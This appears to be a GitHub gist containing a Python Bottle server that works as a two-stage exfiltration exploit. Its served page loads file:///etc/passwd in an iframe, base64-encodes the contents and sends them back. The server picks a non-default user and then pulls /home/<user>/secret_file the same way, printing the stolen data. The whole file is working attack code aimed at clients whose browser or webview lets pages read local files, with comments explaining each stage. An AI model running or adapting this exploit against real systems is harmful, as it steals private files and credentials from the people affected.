@csalazar
Created November 30, 2020 17:32
import re
from base64 import b64decode
from bottle import request, route, run
# Page template served to the browser. Two `%s` slots: the first is the path
# loaded into the "file" frame as a file:/// URL, the second is the numeric
# suffix of the /exfil<n> route that the "exfil" frame is pointed at once the
# file frame has loaded. The loaded document's body innerHTML is base64-encoded
# (btoa) and sent back as the `data` query parameter.
# NOTE(review): because the payload travels in the query string of /exfil1 and
# /exfil2, every exfiltrated document shows up as a long base64 `data=` value in
# this server's request log.
html = """
<html>
<body>
<iframe id="file"></iframe>
<iframe id="exfil"></iframe>
<script>
var frame = document.getElementById('file');
frame.src = 'file:///%s';
frame.onload = function() {
const base64File = btoa(frame.contentDocument.body.innerHTML);
document.getElementById('exfil').src = "/exfil%s?data=" + base64File;
}
</script>
</body>
</html>
"""
def parse_users(data):
    """Return the account names in passwd-format text that are not Ubuntu defaults.

    Args:
        data: text in /etc/passwd layout, one ``name:...`` record per line.

    Returns:
        A list of the names not present in the built-in Ubuntu 20.04 default
        account set. The order is whatever the set difference yields, so it is
        not stable between runs.

    Raises:
        IndexError: if any line (including an empty one) has no ``name:`` prefix,
            since the regex match for that line is empty.
    """
    # Default users in ubuntu 20.04
    default_accounts = frozenset({
        "backup", "systemd-timesync", "avahi-autoipd", "cups-pk-helper", "syslog",
        "geoclue", "gnome-initial-setup", "systemd-network", "usbmux", "vboxadd", "uuidd",
        "redis", "bin", "pulse", "systemd-coredump", "mail", "uucp", "news", "_apt", "messagebus",
        "proxy", "dnsmasq", "whoopsie", "www-data", "speech-dispatcher", "root", "gdm",
        "systemd-resolve", "hplip", "sync", "avahi", "sshd", "tss", "irc", "daemon", "saned",
        "list", "rtkit", "colord", "sys", "games", "nm-openvpn", "tcpdump", "nobody", "man",
        "kernoops", "lp", "gnats",
    })
    # The leading text up to the first ':' of each record is the account name.
    seen = {re.findall("^([^:]+):", record)[0] for record in data.splitlines()}
    return list(seen.difference(default_accounts))
@route("/")
def index():
    """Serve the first stage: the template aimed at /etc/passwd, reporting to /exfil1."""
    initial_path = "/etc/passwd"
    stage = 1
    return html % (initial_path, stage)
@route("/exfil1")
def exfil1():
    """Handle the base64 passwd contents and serve the second-stage template.

    Reads the ``data`` query parameter, decodes it, picks the first
    non-default account `parse_users` returns, and renders the template
    against that account's ``secret_file`` with /exfil2 as the report route.

    Raises:
        KeyError: if the ``data`` query parameter is absent.
        IndexError: if no non-default account was found.
    """
    encoded = request.query["data"]
    passwd_text = b64decode(encoded).decode()
    candidates = parse_users(passwd_text)
    # Set-difference order: "first" is arbitrary, not the lowest UID.
    user = candidates[0]
    target = f"/home/{user}/secret_file"
    print(f"[exploit] Detected user: {user}")
    print(f"[exploit] Requesting path {target} ..")
    return html % (target, 2)
@route("/exfil2")
def exfil2():
    """Final stage: decode the base64 ``data`` parameter, print it, return an empty page.

    Raises:
        KeyError: if the ``data`` query parameter is absent.
    """
    received = b64decode(request.query["data"]).decode()
    print(f"[exploit] Retrieved file content: {received}")
    return "<html></html>"
# Bind on every interface (0.0.0.0), so the collector is reachable from the
# network rather than only from localhost.
run(port=8080, host="0.0.0.0")